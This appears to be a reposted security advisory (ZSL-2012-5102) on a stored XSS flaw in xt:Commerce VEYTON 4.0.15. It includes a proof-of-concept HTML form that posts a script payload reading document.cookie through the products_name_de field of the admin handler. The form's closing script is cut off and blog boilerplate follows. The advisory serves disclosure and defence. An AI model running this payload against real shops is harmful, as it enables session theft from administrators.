<!DOCTYPE html>

xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability

Vendor: xt:Commerce GmbH / xt:Commerce International Ltd.
Product web page: http://www.xt-commerce.com
Affected version: VEYTON 4.0.15 Professional/Merchant/Ultimate

Summary: One shop system, many shop solutions. The shop software
xt:Commerce 4 is the basic framework for online shops and for
merchants who install and configure their own shop.

Desc: xt:Commerce suffers from a stored XSS vulnerability when
parsing user input to the 'products_name_de' parameter via POST
method thru '/xtAdmin/adminHandler.php' script. Attackers can
exploit this weakness to execute arbitrary HTML and script code
in a user's browser session.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2012-5102
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5102.php



<title>xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability</title>
<form name="XSS" method="POST" action="http://localhost/xtAdmin/adminHandler.php?load_section=product&pg=overview&parentNode=_pnl1345421066692_7751&edit_id=6&gridHandle=productgridForm&edit_id=6&save=true">
<input type="hidden" name="date_available" value="2012-08-28 12:00:00" />
<input type="hidden" name="flag_has_specials" value="0" />
<input type="hidden" name="google_product_cat" value="New" />
<input type="hidden" name="group_permission_info" value="Ihr Rechte-System ist eingestellt auf "Blacklist" Wenn Sie eine Berechtigung auswählen wird dieser Datensatz für die Gruppe deaktiviert!" />
<input type="hidden" name="manufacturers_id" value="0" />
<input type="hidden" name="meta_description_de" value="XSS" />
<input type="hidden" name="meta_keywords_de" value="ZSL-2012-5102" />
<input type="hidden" name="meta_title_de" value="Vulnerability" />
<input type="hidden" name="permission_id" value="1" />
<input type="hidden" name="price_flag_graduated_1" value="0" />
<input type="hidden" name="price_flag_graduated_2" value="0" />
<input type="hidden" name="price_flag_graduated_3" value="0" />
<input type="hidden" name="price_flag_graduated_all" value="0" />
<input type="hidden" name="product_list_template" value="" />
<input type="hidden" name="product_template" value="" />
<input type="hidden" name="products_average_quantity" value="0" />
<input type="hidden" name="products_cmc" value="" />
<input type="hidden" name="products_description_de" value="thricer" />
<input type="hidden" name="products_ean" value="1" />
<input type="hidden" name="products_id" value="10" />
<input type="hidden" name="products_image" value="Bild" />
<input type="hidden" name="products_keywords_de" value="Zero Science Lab" />
<input type="hidden" name="products_master_model" value="" />
<input type="hidden" name="products_model" value="T-3000" />
<input type="hidden" name="products_model_old" value="T-1000" />
<input type="hidden" name="products_name_de" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="products_option_list_temp..." value="" />
<input type="hidden" name="products_option_template" value="" />
<input type="hidden" name="products_owner" value="1" />
<input type="hidden" name="products_price" value="0" />
<input type="hidden" name="products_quantity" value="0.00" />
<input type="hidden" name="products_shippingtime" value="0" />
<input type="hidden" name="products_short_descriptio..." value="t00t" />
<input type="hidden" name="products_sort" value="0" />
<input type="hidden" name="products_startpage_sort" value="0" />
<input type="hidden" name="products_tax_class_id" value="0" />
<input type="hidden" name="products_url_de" value="www.zeroscience.mk" />
<input type="hidden" name="products_vpe" value="0" />
<input type="hidden" name="products_vpe_value" value="0.0000" />
<input type="hidden" name="products_weight" value="0.0000" />
<input type="hidden" name="shop_permission_info" value="Ihr Rechte-System ist eingestellt auf "Blacklist" Wenn Sie eine Berechtigung auswählen wird dieser Datensatz für die Gruppe deaktiviert!" />
<input type="hidden" name="total_downloads" value="0" />
<input type="hidden" name="url_text_de" value="de/a2" />
<script type="text/javascript">
Rate this post
Брой прочитания на тази страница: 434
xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability
Tagged on:

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *